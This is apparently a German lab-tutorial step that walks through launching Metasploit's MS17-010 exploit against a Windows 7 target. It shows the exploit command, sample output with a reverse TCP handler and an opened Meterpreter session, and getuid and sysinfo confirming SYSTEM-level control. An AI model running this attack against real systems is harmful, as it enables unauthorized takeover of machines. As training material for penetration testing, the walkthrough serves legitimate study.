Ausführen des Exploits und Herstellen einer Meterpreter-Sitzung
In diesem Schritt, nachdem alle Optionen konfiguriert wurden, starten Sie den Exploit und übernehmen die Kontrolle über die Zielmaschine.
Die gesamte Vorbereitung ist abgeschlossen. Der Exploit ist ausgewählt, das Ziel ist gesetzt und der Payload ist gewählt. Um den Angriff zu starten, verwenden Sie einfach den Befehl exploit.
exploit
Metasploit wird nun versuchen, die Schwachstelle auf dem Ziel auszunutzen. Sie sehen mehrere Statusmeldungen, während es arbeitet. Wenn erfolgreich, liefert der Exploit den Meterpreter-Payload aus, und Sie sehen eine Meldung, die "WIN!" anzeigt und dass eine neue Sitzung geöffnet wurde.
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
...
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.101:49157) at 2023-10-27 10:30:00 -0400
meterpreter >
Die Eingabeaufforderung meterpreter > bedeutet Erfolg! Sie haben nun eine Remote-Shell auf der Opfermaschine. Um Ihre Kontrolle zu beweisen, führen Sie den Befehl getuid aus, um zu sehen, unter welchem Benutzerkonto Sie laufen.
getuid
Die Ausgabe sollte lauten:
Server username: NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM ist die höchste Berechtigungsstufe auf einem Windows-System. Sie haben das Ziel erfolgreich kompromittiert. Sie können auch sysinfo ausführen, um Systeminformationen zu erhalten.
sysinfo
Computer : WIN7-VICTIM
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
Herzlichen Glückwunsch, Sie haben MS17-010 erfolgreich ausgenutzt.